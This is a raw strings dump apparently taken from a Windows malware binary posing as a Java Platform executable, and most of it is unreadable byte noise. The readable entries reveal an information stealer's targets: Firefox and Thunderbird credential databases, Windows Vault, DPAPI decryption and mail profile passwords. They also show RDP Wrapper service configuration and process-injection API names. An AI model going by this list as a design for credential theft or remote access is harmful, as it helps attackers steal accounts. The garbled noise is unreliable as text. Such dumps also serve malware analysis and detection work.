"n$(.1~", "KbcK`b", "Email", "-'HX", "CS?od", ";\\e8+QM", "GetCurrentProcess", "fsC7#", "WaitForMultipleObjects", "bqPldV", "JJJIIIIKJJJ.JJJIIIIKJJJ", "A_MhF7", "S'YeY", "?|5[J", "tuKc_", "KmZL|", "'7Qyb", "|0`h9", "J2/DII", "RtlGetCurrentPeb", "q}kYen", "*=$d7", "bi\\4K6=#", "/+MzAY /", "GetMapMode", "JJJIIIILJJJz", "F(j)9", "vI|CJ", "%hgL&/", "1)1E1U1[1n1", "C=I1<", "1[u#6K", "@V(8G", "riKM$", "svARoE", "ARg", "|d@#J", "cfXOIm", "C}q'3", "[WluZ", "C`2T4", "nsawc", "MJJJ2", "7$ut,", "Dc)p@)Ij", "VT.F&", ".D7XI_^", "-4lUz{D", "J29>II", ">hbtK", "2,2D2O2`2|2", "m\"rc9", "GHE:A@", "UIfOY|", "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJn", "SessionEnv", "v`=h1", "IiIpInI", "5b$WC", "bEogH", "zydo[", "VirtualAllocEx", "F2-FII", "M^sZ\\", "Soykv", "{vxHs", "}d^hT", "NKJJ2", "ySa}X", "l7a`h", "[$m'gV", "t> K_", "GetTokenInformation", "fQGn[", "EnableWindow", "UP=t.", "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJf", "gG$be", "JXJJJJJKJJJJZ", "unpack200", "oIJJJY", "q/XA%7", "JAIJJ", ">h=ZPhD", "4X/Ti-", "ku*+9", "+Q@l+T", "Oa;0#k", "K2lw;g", "@qI?1", "veiKfon", "SetUnhandledExceptionFilter", "j7,ab", "kbUiS", "7- ;`.e", "JBIJJ", "dj3goQ", "Oracle Corporation", "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "4iHkK", "vYiSV", "W\"#d4", "PWh@SA", "JJJJIIIIVJJJ", "USER32.dll", "PtInRegion", ">d0>Z", "IpIwIiInI", "Wz*Fp", ".[bLV1N", "V+YlN", "J4I-RD", "#Sf`H", "`,96m", "d~OxLa[", "H%$@q", "{RjR{5[", "&dO_IF'", "R`$|!", "SetEvent", "I`:\",", "[uQdj", "2YEII", "FHH1", "InternalName", "&_zv9$", "g/$:iw", "~v4wD", "IPk]\\OC", "FileVersion", "s$1IHB", "VoU\\I", "jQPVxa", "2@+II}", "spVtx", "nNKgb", "+}UO2", "nZAnn", "FR_sK", "qbTVL", "@*,\"3", "oHP({", "_P/r]", "hMiVuf", "J`y`T", "0", "JLJJJJJJJMJJJJJJJNJJJJJJJOJJJJJJJ", "nNuG5|", "d!)@b", "pLUmh", "2$HII", "rdpWrap64", "t,2O}", "cK-Fx", "6'7?7h7", "x?0hi", "}:AM/+", "n{r5#", "U|ckrnot", "%Y", "VFF3|iB", "NSSBase64_DecodeBuffer", "DOh?EW", "&>9Y}", "2rDII", "MymZY", ",$zQl", "#CZpM\\", "lVFsy", "SmCsw", "g('ft", "r&l|}", "(|u~]Y", "Tzv}z", "Jb4oT", "E8I|HA", "J2`III", "(&nqL", "0=O`b", "W}cRa", "*]>:n", "LegalCopyright", "On`;/", "_acmdln", "RMeZP", "Xy^q{x", " =C5IKQ;`", "+B145", "z!&_?", "=NH`t`", " ", "EP[bM", "VG?[XL0", "g5fpl", "}7wy)(Q", "ll$4kofO", "M05~pC$s", "PSVW3", "vaultcli.dll", "CloseServiceHandle", "(FFY|'", "kPz\"#cx", "=ZU/&;", "41464;4@4G4N4R4X4v4", "q\\C^^", "}gmFP", "OEyB(", "|3t6Se", "K;!0t", ".+{WT", "VS_VERSION_INFO", "fJJJ2", "freebl3.dll", "]ZAlW!m/", "Y|8\"T", "TVjD3", "< <$<", "wcoRb", "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIILI", "}T'F:>", "FkxP\"", "9J;e;", "etS@B", "PolyLine10", "oJwlm[J{", "s~sRV", "jjjjjj", "*IV'$:", "86.m^U", "w\\^nq", ";:6d2", "W", "RpwtMN", "\"nc <", "PolyLine20", "gRngBt", "!2 tg\\", "+x}(Sh", "MQO{bN;}", "oCI0Zu", "H&A3s", "H)IIIIIIIIIIYJIa", "!t7>q\"vh!", "Xn >/", "QQSV3", "=9=I=R=Y=", "JoFII", "{M.$F_Xw", "7m^iZvN'", "QlYSQ", "bldZ,,", "Zmr\\tn", "z@_ n", "JJJJJJJJJJJJJJJJJ`", "2!+II", "\\$,tZ", "JJJJJ:", "F2r%II", "H v#o0P", "JTJJJ", "_m`]o", "J\\Sai", "IIIOIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII", "NMO#|", "%5&JsDe)cV", " xu n", "RegDeleteKeyW", "mq(Cl=", "373D3Q3^3k3x3", "KHbyI", "SOFTWARE\\Microsoft\\Cryptography", "EET$.", "GetRawInputData", "lstrcatA", "/\"2J`*", "*()%@5YTGT3456TMOYTR56QW3$#57$#!@524982857*()%@5YTGT3456TMOYTR56QW3$#57$#!@", "JHIJJ", "fT@Ii", "ci|Z*", "]\\;1.", "JKJJJ", "o*&)+e", "M%_x;", "eKnwK}", "4]Sm'*", "WM_DSP", "pyfWZ", "Z8bI:", "iDSNDT", "[KjtV", "[u$Mr;", "a%w0 (", "ZJJJ2x", "b0]B*", "[C0gov", ";<.Q{TVW", "w4N1,", "6U7n7", "nWUlT", "NJJZJ", "=sX>)d", "2WuB%Wj", "&|#m&o ,", ".CRT$XCA", "hxndP_", "gqQVg", "5]5t5", "H(}QE", "U]eniP", "Sit{XO", "C\">>\\", "Q&_S", "}P~Ifmv", "9,G`F", "a9l\\#G", "tz/i3;", "IIIYIIIYJIdJIII", "Z?7}B", ":2.@II", "PWqj%", "VirtualQuery", "J2(EII", "H1X<$ ", "J2ACII", "<_C,+0", "xOV|P", "$RL0'", "jilyp{", "6^*Co", "8=xGf", "2Z+II", "bF(+q", "Polygon77", "D{@$C", "nRIIII}", "The ordinal %u could not be located in the dynamic link library %s", "S]\" >Kj*", ":}u\\l", "|t\\ww", "aFC2-", "~.J.:", "&Gspu", "QO&b%", "f.bN@", "0}[)>", "jJJJJ", "vcruntime140.dll", "J$IJJ", "Polygon5", "Ut)P1i[", "2_GII}", "naKtb", "wYqnr", "i2d+jI", "U2*SY", "PF_Xu", "0c0904b0", "fboyO", "FindNextFileW", "0|SP[", "h)!D@{", "JJJJJ", "NJJJJJxJJJ", "PolyLine42", "1qwdx-", "OwItf", "CreateFileA", "2\"ge9", "yRc~U", "&About FlowerPower...", "Sv|\\H", "+e'FY", " wn\"f", "Mx,xt", "u=g(z", "zq%wn", "GIIoIJJJ", "g5IH%", "(kv0V", "DispatchMessageA", "fA]Gv|", "OKJJ2", "IIIIIIJIIIII", "M>PJ:[7fk", "2TjJJ", "SB?i-F", "vIb$'", " (08@P`p", "(9,x'_", "Kaa(ol:^J", "gMtR`h", "@U#g0", " %rId", "7II3|LJJ", "w.Q ", "Bccc(", "Polygon38", "&o$x%", "TehbT", "H1~Wh<1", "y?7HN", "hC3fp", "UgykU", "", "K{>sS", ".rR{t", "f5M.g", "MachineGuid", "Lqwy_r{", "JTJJJ3", "a |L:", "ExU!V;\"", "LoadLibraryW", "0>1W1", "uHarl", "]}Snm2BG+dfu", "YTPdb", "*..x~6", "ig8J<", "uy}36", "a\\nQs_", "2!V5}", "S'++:", "LhB`bk\\", "6&1iX", "9W^^4", "LMcuLj", "~NJJJJZ", "SizeofResource", "Fz#0}AR", "xZUjw", "\\rdpwrap.ini", "1L2c2", ")|)8)", "ogP/Z", "PolyLine68", "I@#4u", "8F@N-", "HHkrjyW", ">l2\"a", ">\\y:y", "rGvfw", "F6}x8", "IIIMIIIIIIIIIIIIIIiII)", "9OU?I", "%BQ96", "Polygon15", "SpWrf", "IIIIWIIIIJIIWIII", "H:X{>", "nY zJ", "z[/']W", "$=a'g8y", "S^kNT", "I3HN8", "i2$?II", "XV2}@{^", "6ZMM/", "Lz{u`", "`VHu4", "&][lT", "Xb/1I", "N_-6C", "SBst%", "`5ywGJJ", "`Ji1Y", "|x?Il", "[ducR", "y$y)y", ">Ql6M", "[mffu", "h|Q+{4", ";uv9xJ", "H[72_", "NJnwZ", "n_.[X-BLxR", "jkR>>", "z{AjvZSRWw", "IW@VP@", "62m/II", "z:bk\"", "{a\\H\\1", "Q2/dr", "*PH0t", "PWhx#B", "find.exe", "R^*ax", "Q?R(9N4", "JHkNk", ">26&II", "$_nmv", "J2oEII", "-^L0\"", "R{[t9d", "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJv", "{UzbcJ", "DrawTextA", "585Q5j5", "8[N[/", "=l\"5))", "@!S}p1", "88)88", "wsprintfA", "6%F8O0", "On Nc`zj", "t3;x~", "WQSh0", "\"SF=+", "u7=&[", "*98jX", "~Y&vp", "1N0392", "2O.II", ">9U?f|", "A9[%?dd", "JIIIILJJJWTJJ", "OpenProcessToken", "J2)BII", "jhYOL", "P2[JJJ", "s7M&U$", "MwoMu", "QTQTj", "}M~\\~k~", "TSVjD3", "nR2~FII", ",SVW3", "ADVAPI32.dll", "XBgCm", "RtlLeaveCriticalSection", "&XJqa", "OE.\\EMN", "JJJJJ^", "W8YYP", "3zU3wB", "IIaIIII)IIIKIII", "=VpVX", "ov.GJ", "zM%1g", "y\"/ k", "\\F%J(5v!", "NFz-1", "n;x^<", "Sk8.fo#l", "8Kj-'", "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJR", "6#7R7{7", "E_92_", "zdv^g", "ProductName", "%`lT~", "$T2v^", "LeaveCriticalSection", "x\\gIw", "j\\NWI", "CryptUnprotectData", "7It`86", "FHH1bKII", "PolyLine63", "pMU", "p:Sw<", "KIIIyMyQyUyYy]yayeyiyyy", "9Nem)", "ane8}X", "\"GHHI", "h!a~@d", ",JJJ2~:II", "T]\\n6", "T9bJS", ":IX]x", "B&3~q", "Qi[Vj^", "kM^T?", "KERNEL32.dll", "[Kb&U", "A@(!@", "HJJZJ", "ShellExecuteA", "}dMmn", "JTJJJ3+JJJ", "Q|yW)", "#3hg,", "IIIuIIIIIIIYJIIYIII", "Q^_`flZWJ`", "<><&=Y=^>", "lstrlenA", "&Dh^S@", "nU+\")V", "ke}\"A", "J0VV>", "WdKH8", "9xI;e", "SYSTEM\\CurrentControlSet\\ControlTerminal Server\\AddIns\\Clip Redirector", "Se@&F", "SVWh(", "P'gRvI", "mi~_k", "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIVI", "J$|jh", "l\\!aE", "_m8|H.[", "DM|:+", "8NMCl", "fzQemw", "JJJJJ:I", "6)CR[W", ")93t9", "J IJJ", "E@UXM", "62PC@", "e}zhn", "RJJJ=", "~m%0p", "NR.+2eEt", "SZ(d|", "PaNJkQ", "IiInI", ",?;4G", "kxX-(^@S", "o;S[C", "z\"A:1Jx", "IIIIKJJJnJJJ", "[QF.E", "QQSVW", "yyt%K", "`G7+*>", "%222%333%333%444%555#555#555#555#555#555#555#222#222#222\"nnn", "fbuo]s", "D$X9~", "stB*_", "S\":zlz", "Tc}ygcQ", "BQgj[~]", ";}-@k", "mxl`G", "W! gT", "[yOwL", "48@tUX1", "Rn}xJ", "PolyLine66", "ulc]uL", "]AT.0g", "tUI>m'}Xv[", ",;F0s", "%w[7w", "osjVy", "KRich", ">,Sl;", "O)eVd", "WRzbu", "pBf6W", "6C_vO", "QO}oW^", "^|gJ}", "NSS_Init", "n_QOb", "h65K+", "VqxOn]", "4{&F'", "0U0R ", "nISia", "CoGetObject", "w5/JD", "|)|A|M}U}v}", "V!]|,", "]JJ2UIII5b", "\"\"hLR", "4Sk\\,", "fLly\\", "InitWindows", "\"wYVi", "|NY_y", "$[Wk", "9eKh\"F", "JSUa~", "+[mv&Ln", "{mHIa", "vqHd4]*", "$ete{", "LJJJ2", "dKngP", "+DqR?", "D$89w", "&<\"B`", "2;~V_", "+KKK!", "zvBI!", "sU{( ", "WRShx", "O,x$D", "0rCCh", "B]VVG", "Ysmpp", "XQW:R", "WriteProcessMemory", "PolyLine14", "\\OB/@", "yz:?YG", "?&FKrx", "PolyPolygon94", "GetCommandLineA", "KIIIIIIIIII)NJI", "rjB$3", "Ec,;F", "XF]keNO", "_XcptFilter", "&fZ3;", "CHHKIJI", "}{6{+&", "nsq5%", "sqlite3_column_text", "[1dj}", "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJ~", "!T/T(", "P4", "_controlfp", "{`Oon", ".l;Pq", "IsWow64Process", "3\"434<6C6J6R6W6^6q6v6", "pV *i", "mMHq6", "]XTm]", "To=wI3", "\">vt~", "Mfr]z", "!p(0c*", "EP&20", "*()%@5YTGT3456TMOYTR56QW3$#57$#!@1000*()%@5YTGT3456TMOYTR56QW3$#57$#!@StikyNot.exe*()%@5YTGT3456TMOYTR56QW3$#57$#!@SyncHost.exe*()%@5YTGT3456TMOYTR56QW3$#57$#!@Microsoft OneDrive*()%@5YTGT3456TMOYTR56QW3$#57$#!@*()%@5YTGT3456TMOYTR56QW3$#57$#!@", "P}GK]", "$)yU@Z", "Ct9o3", "2<4*(", "owweTa0v", "KoyuM", "w2ZIG", "IIIIIIJIIIIIyJIIIIII", "18]e>", "RkuGi", "Y~pjw", "Gx\"Z)]", "3Z/_\\ ;m", "ehz58", "nGOufY", "ta,XFG", "LegalTrademarks", "thunderbird.exe", "PolyPolygon95", "2H'wJ", "OJ9(e", "`qRdo", "(/,T[6", "@vnwQ", "A_2ZB4", "TP;[7", "kSyW:", "PolyLine35", "L}/i=", "At1x7", "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIbI", "9.+Of~6", "UQ:fo", "+AJsj", "$(<*({x", "n?a$S", "pP>~NZ", "VWQQ3", "Lcdcz", "SetCursor", "Mb~iO", "r%a", "4uj2PB", "]#Y-G", "7'je%", " Qva0", "J=IJJ", "_opNl", ".ekqk", "TqrSyw", "ClientToScreen", "wYMYx", "Polygon44", "$v2!Bv", "C)bUP", "JJJJJB", "'aTT)", "H#2X\"O", "IyIIH", "]O|Sl", "$#>roA", "JJIob", "1l`r%", "2d'a#", "}voy\\", "pIj2Ub", "3gl#|", "bCkAf", "%OQ(~", "QJJJ2", "C_9sn", "e1)V@", "ZRa^L", "@3r+1", "Wow64RevertWow64FsRedirection", "CreateWindowExW", "PolyLine62", "3LKJJ", "TranslateMessage", "NMKwa", "LoadLibraryExW", "8BR#]s", "o.rAw", ";I~D1", "2wt\"k", " 3JQC", "3%474c4", "]OXqX", "0vY8X", "#k.Z}1", "Ov\\oYu", "J28III", "3#.g1", "X%D%D", "0^e}Q<", ";u", "tNnuf", "UoxJOb", "5wY#lz", "J2`'II", "i;N[E", "1xR'1", "eoz)s", "X_\"%d", "HeapFree", "7oe_(", "nY$`7", "CreateThread", "v99*r8j", "R>d1H", "hM\\nU", "S;j7mjZ", "Q9)O#H", "QO/X=B", "KJJKwb", "rqe7%&h", "ZJ9[JS", "\\ZL6M8", "FX~{X", "XmTZ}", "jp8m8", "+J:II", "zdbeO", "iBWt9", "Y:[l,", "f.[+#", "*2Y8II", ")u8,7", "LYvSw", "B:C&y", "%~3Y3", "zU~bN", "Yc\\|Jx", ">NJJJ", "oQ^LN|", "LS`@Xt", "nN3FHII}", "BA~bS", "z9Rl:", "JJJIIIIKJJJ~JJJIIIIKJJJ", "$+)tr", "\\DII3", "PolyLine31", "~RQK3-", "sheH_", "xUDFpW", "%TJJJvzY", "jVMwK", "~><{d", "W~#v$", "9Wb\"(", "Polygon46", "GF;qg", "XA\"2QJJJ", "pfw~2Y", "k`oJE", "LNUmS", "l2@@Xj", "P\"U!%", "u]fTA%1IrQ", "Q=\"uH", "\\OkVh", "%@,6W", "sqlite3_step", "\"L2w]\"3", "lT[o&", "|#{lFZE", "3h3II5B", "9,929[9b9p9", "]~_Efd", "(-GhS", ";VZT8", "{uceU_", "JJIIIIVJJJ", "nR2CDII", "mcQPR", "rdpWrapIni", "^S -1", "yEn%Xu", "Vvkk!", "3 3;3H3[3", "{A>-,b", "pvids", "J2TAII", "n2mdb", "Profile", "9`2(Q", "\"f3A3", "JJJ%xwI", "jjxmz", "ykUjl", "`FRTY_K", "ihhGf", "Ovyx3", "PolyLine56", "PVShH", "OOt/#L", "nfrVM", "FHH1)JII", "PolyLine7", ",J:II", "=T/hq", "K]rsI", "RJ0kh", "g4496", "uyxl}O", "pI4Sm", "Q,/ug", "pl4L)o", "IIIgy", "1w,v:", "[wNRJ", "Xsx`%", "encryptedUsername", "3[0v|", "OKwQK", "L8F,:", "w?", "JJJJJJJJJ|]", "POP3 Password", "LPtoDP", "%*)m:D", "cJJ5/", "5axb ", ";JJJI", "rhQ%i", "ge~Tk", "2\"2/252J2P2\\2d2n2t2{2", "8<@~M", "X;Cvg", "}H%p0/!'", "s1\\7!", "?$kg(", "-MMim~'", "ej]G|;", "RjQhk", "[-tXj*", "Q06{G", "==>z>R?", "onSo=", "SzbA^", "SYSTEM\\CurrentControlSet\\Services\\TermService", "+IJJJ=", "XP0n(", "Mxnz6", "HsEt$u", "V2hGII", "Q#cbNS", "Uzngs", "Oj.uc", "JJJIIIIKJJJ,JJJIIIIKJJJ", "XSnf=", "+o{brp", "WoiUJ", "1VY@X9", "(vaKy", "oyoIA", "\"L hI", "2[q\"Nf", "T^\\4;", "C!f.Q", "/K?M+#", "cL!v<", "0h6l:", "ra_;>", "+GAWL", "TRnjO", "2k4II", "+j&+?", "@Uf]h", "RtlGetVersion", "4wVfXB", "|$4PQ", "fU;J0", "GH?lA", "@N +0", "PWhP|B", "tNb~`", ",W&V_", "!WIi6", "qlI7+l", "3cx l1", "?!?1?7?=?C?N?T?_?e?p?v?", "G@S\\wbz", "{o>@-", "Polygon79", "L=M2={Q", "Polygon69", ">YJkc", "vkPVF", "PolyLine22", ">gAL,%", "2\\9II", "Richu", "@send.db", "Polygon27", "@+/A_", ")^#D&", "ja#{V", "JPylbs", "Internet Explorer", ",j&G3", "jA@`Z", "4c", "*W{&dm", "zhOnmh", "y1yQzYz]zazezizmzqzuzyz", "\\JIa;", "MvUsU", "Y5O#\"", "bfM~i", "J24HII", "Vj0g)", "'mG12l!", "jso|I", "vX]Rj", "7~)IQ", "J5moIJJJ", "~i`uXLr", "]XwkM", "T7X7\\7t7x7|7h:l:", "iz!#+k!a", "$PxIcxIy", "OT1^S$*", "N}%5O", "", "Install", "+[0w:", "kc[k\\", "JIIIIII", "Q{vxkp", "dwAz^", "Account Name", "^7{C}Tb", "566i6", ";[e9;", "#f4|]", "FreeLibrary", "\\kbpm", "&+mL|q", "(Ed=/", ")?{C[", "3.?VE'", "O$0u-", "PolyPolygon75", "^TV{xA", "w/];y", "bN[y`g", "^/-`K", "E{fm4=", "\"rdbh", "9@QI|", "T$ RP", "7~5T7", "9#_PC", "/oAf`", "Nf$52", "Vw&COK", "JJJJJr", "q3~<'", "o>F+oJ7", "FII2==II", "rPOHKE", "D!lvyJ", "oYJT?", "X!y f", "Ng{kd", "GDI32.dll", ";zSR|", "7T8e8", "_KyG\"z);", "Dt3$:f", "[4,~ab\\", "0$1-1O1", "0R8-#;W", "e4PFP", "z\"z2z", "^05*}&", "RegisterClassW", ">:xTC&", "kWviZ", "2;IIIY", "Z8SZHO<", "+D7XI_^", "`O.q&", "?lst@@YAXHJ@Z", "W,Y0O9:!f8", "<\"u(A", "|WSuO", "4\"Fh{M", "-3G H", "nmZ@z", ".idata$4", "%[1(bA", ".idata", "j{dRM|", "o^8j4D", "PolyLine16", "QiaVp", "J28EII", "JJtQy", "IIKIIIIIYIII", "3FVq-", "IiII%IIIayiy", "III5v", "DQ_k~n", "(m*,*/", ")UdzBx", "t`&&D", "ELII|H", "zW{^{", "a\\??c", "E=[z3", "yX&xs", "P2}JJJ", "0TFfR", "cxsl_`", "5 5$5(5,5054585<5@5D5H5L5P5T5X5\\5`5d5h5l5p5", "QSVWh", ":$r'p5;", "msvcr120.dll", "GLCq(p", "DJZJJ", "MAINICON", "wsprintfW", " V|n-(", "A6tMu", "N53Gg", "9\\$4t8", "{u|Tf", "PoPIC", "XikQj", "a8YD=G", "h/r{C", "PolyLine9", "TlvVmj}", "F9J8}", "uzevZ", "cjsC:", "D$(];", "Polygon74", "Kz%`^", "N8I/z", "BJ=]V`", "RN L&|p", "HII2^", "2R\"II", "L+a!UBG%", "/G3-n|", "LIIIIIIIIII", "v`Zcf", "X;.p;", "{pUhPS", "Oq5~[t", "VYlr!", "d]}ma", "3~z0,_", "^kgkg", "e)Ol0", "t\"Fk@", "OKJjb", "|RR]Ze", "o`,&4o", "By\"7-", "\"6+Sa", "+gG,e", "C+9f2Aj", "^\\?6e", "i^wZYKK", "1y.!v", "MessageBoxW", "(ZcVi", "d5U{x", "hpwz]", "YlE,2", "3zIII", "N93zO", "K,jI=", "PolyLine53", "-&rho", "P2AF,3", "\\f", "f_Q[$", "GHH!~", "ExicG", ".reloc", "hVqI{e", "iuQPv", "|~GPs", "_qyLv", "{0{J|Y|", "PostQuitMessage", "Java(TM) Platform SE binary", "[?+k\"", "_(, J", "7T^a/", "V &ZA", "4AyC3", "II3>JJJ", "?JJJ5S", ",-(7C", "2zIII", "mikAxRA[", "SJ;sP>tPD<", "JJJJJJJJJZl", "TopFlowerPetal", ">IIu9", ":[H$PB", "NPJJJ", "j$QVf", "D$ WP", "#pxKau`", "x|hf\"", "IIIISIIIJ", "\"W2z@", "2(~b|9V", "Oy*86", "F][f6", "zK?L7G", "jJOccV", "tX]i_", "\"HII}", "JIIIIKJJJzJJJIIIIPJJJ", "S,H^>", "JUJJJ5d", "8 d@^", ")HIIJY", "AllocateAndInitializeSid", "qSi'9", "CsP[#", "s@//F", "hGjM07", "0'x@Q", "( 0j+", "(!i`2n", "cs[Ym", "mF;`e_9", "PolyLine38", "2x:f(", "J2%`JJ2p%II", "de\\mO", "OMc]9^MD+", "{#{-{7{A{K|U|_|i|s|", "Polygon41", "T\"maaf-s", "U3l|t|", "7;TM9o]", "3FK7'", "SD-!(", "PolyLine4", ">9>`>", "J8IJJ", "}pju]R", ".idata$5", "+T/H\\", "JEIJJ", "J2g[JJ5|", "PolyPolygon91", "ntdll.dll", "wF,S$", "1_-kM", "#4n$Q", "_fLs~jK", "SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters", "DeleteCriticalSection", "IpIiI", "qjTjJc", "*m&!x", "s2^@Y$", "TerminateThread", "@w7L3R{", ">Kxea=", "^1(HdD", "`NnE\\", "UBf}%", "r_fa>", "]aZj`", "_onexit", "}&s-@", "b`1?v", "onOem", "`t\\Ts", "z{|}~", "asXy :", "h]?siN", "IIIIQIIII", "{Be5+*^", "QZn<,", "rH-|1", "J^JJY", "KJ2c3II", "0n=A ", "{i5;j", "~lgiH", "JJJJJf", "=O>s>", "sqlite3_open_v2", "[yo}L", "D/17e", "qvgIp", "}4t;R0", ">#7b1}", "LCPJ=", "E3&Nc", "Q!3=63M]4", "bQ|Cb", "qWOjC", "Hey I'm Admin", "T-laW", "mlqTbv", "JLbem", "VYXC(6", "y)9_@", "*4(QB49", "xc!M0", "11}_\"", "'X|\\I", "5!5t7", "p0.&2", "mdr|Q", "\\firefox.exe", "iMyNY", "$61Hke", "/t\"2-7?", "J2&GII", "!Jo=)", "]!e7b", "Nd 0U", "LdrLoadDll", "gNv[v", "'Go/7", ",{_1K", "V|{{qx", "]J$<4", ";k=!0", "Ppi{K", "z2z:zBzJ{R{", "brnXsu", "jUOL3", "TB@b/", "NtAllocateVirtualMemory", "%ProgramW6432%", ">_5j9", "g/Z,0", "t#pD?%", "B4yr*}%", "^zA_J", "2,4II", "JK3^I", "B,1]U", "rdpWrap32", "H?7t;", "-A-^ U", "_T+DE", "O9v[@X", "nN2JCII", "Java(TM) Platform SE 8", "oZ0jF", "=rSZvr", "zW@V ", "?{e?2", "+:CfPPK", "JJJIIIIKJJJ0JJJ", "X|5s]", "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "c_LV\\u", "caT]p[", "RegSetValueExW", "=X90rp", ".CRT$XCU", "qJst*", "rYIudn", "u4[%!M", "c&nzU", ";;F,s", "V?z2;", "D:9*@", "vNs|5", "pX\\yd", "JMJJJ5j2A", "gnsqB", "KIIIIIIIIIIETJIYIIIIIIIIIIIUUJI", "]VjyK", "9gb61", "kzKxw", "XrsXr", "ZgK4g", "sqlite3_exec", "6\"$ I", "RightFlowerPetal2", "U*v|~", "MessageBoxA", "ToUnicode", "0L~W3", "]= Yg", "%R9uk", "U*!'-=", "F4a1H", "'gF6<", "PolyLine15", "0q4$ ", "B2f8II", "GetLastError", "LK$^E~", "A)>h?pBxjr[", "m|ZB`", "fyoiL", "jng;q", "mSPVz.", "+6:mUd", "Polygon70", "=z*}M~", "|P>qju", "ZzLnTg", "r#Lg$", "N QQs", "[E1o/", "CoInitialize", "BBHELP", "NFi1v8", "xv.E\\b", "M2lGII}", "urlmon.dll", "s=:EYha", "JrJJJ", "qpSi[", "PolyLine29", "GetModuleFileNameExW", "YjQiTl", "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIINZ", "Polygon57", "f9$AB?", "xdCVp", "ss`hJt", "*hlta", "))}}Q", "58TJJJ", "V`h!7", "Cy>0 ", "p%cqA7a", "dq23})", "|~Yc{R}", "r7x_=", "z[qoI", "50[031`1!2N2*3W3o4", "PolyLine28", "GetPrivateProfileStringW", "?MJ?`", "Q)^zu", "DeleteFileW", "z $0s", "ouj]Q", "J--Z=", "x\"Zex", "O\\7bm", "PSSSSSSh ", "CHsw:", "\\M_'a", "k_rYdZy", "j*tZG", "EnumServicesStatusExW", "[V~bt", "I>F7D", "xHHHI", "V>V;S", ".text", "R9n>`", "HII2[", "L6/08", "CopyRect", "0ph>_:v", "YtSjCx", "2`DII", "\\BLhL3T", "JtLP].", " ]2b)", "^ /Z8", "oetc\\", "5L0F*n", "6F5iW", "Xub_ip", "28EII", "ia_~f", "U|Uhj`L", "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJ.", "$.@Zx", "Polygon64", "*D&QV", "MaxConnectionsPerServer", "-bcUf", "uq_I}", "!,%LxY/", "C>_aI", "aqPW(", "Oudwa", "+Wxw+", "assTl", "L5LIQIQ", "V}+Cj ]", "ub6%l", "f)hp)", "y?PQ&", "w~p{c", "/Pp@e*", "6kLMC", "FII5h", "kernel32", "SZJJ2", "nNu^n", "25III", "vvAQP", "PolyLine52", "hwJIc", "ProductVersion", "QX~zWf|", "xwbD*R", "CoTaskMemFree", "|*5YP", "X 8\"C", "PolyLine26", "`&*l13\"", ".Z1mbI", "qpUtgR", "Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", "Z\"E$\\", "j,qPB", "?(?9?c?", "q-OKx", "h]\\]p", "FTDta", "3rGII", "25EII", ":o_D.", "8V[ln", "i0\\lt", "7q( J(", "iXPb.", "A;E(aw,", ">YL^O1", "ZVm]g}c", "''NU=o", "p2R{3]", "]U&L'", "RM:M\"", "5w'ZW", "PVh@1A", "PkrquB", "TZl[d", "J.IJJ", "*()%@5YTGT3456TMOYTR56QW3$#57$#!@", "E}m>t", "0o@4pw", "ReleaseMutex", "uKw|tZW", "HT5'*", "J&1N_2#", "GvRC/4~", ".idata$3", "#?b;H", "yRsjbz", "St^e+dY", "{Ndks", "Okx\"?", "E%Iv~", "p", "URipN", "01d[x", ":Trs@", "DBrYa", "KE: M", "CIlw<", "x|:{I", "=R\\VI", "383n3", "$.'c%W", "rU*rX==n", "g!x !", "JJJJIIIILJJJ", "=N\\sVA", "LOADER ERROR", "BBABORT", "U {W]i", "W&mT\\", "PVVVVV", "VirtualProtect", "0}PGU", " 2rIII", "OpenServiceW", "PolyPolygon84", "3b}IT", "*010L0", "CG7LK", "Hl{'g", "X<@6Tq", "LoadIconA", "[vT^:z", "r>1Mp", "RegCloseKey", "I`0jLM", "nw(E!", "|Y5uU", "#Qx@a", "zjnpY~", "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\AddIns\\Dynamic VC", "s|Y{W?G", "firefox.exe", "?(:gi", "R+*|c0", "u", "Xl^wlILr", "7 808:8A8J8b8", "iB(xM", "find.db", "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIYIIQJIIIyUyuy", "6'6@6M6", "4ZX0O5b", "=Oit-", "KJI!IIIIIIIIIII", ".aspack", "GxmSj=", "k(r&Fl", "xSxr3j", "g%$Dz", "jl`tf", "@;4T4", "kivPf", "{Yoa[", "+>g{h", "IIIIIIIIIIIIIIIII", "zduM]i", ":s%g$s", "\\1B^b", "8.0.1810.13", "GetTickCount", "R|[NE", "wg@g1-", "z[cpJ\\", "]R]1d", 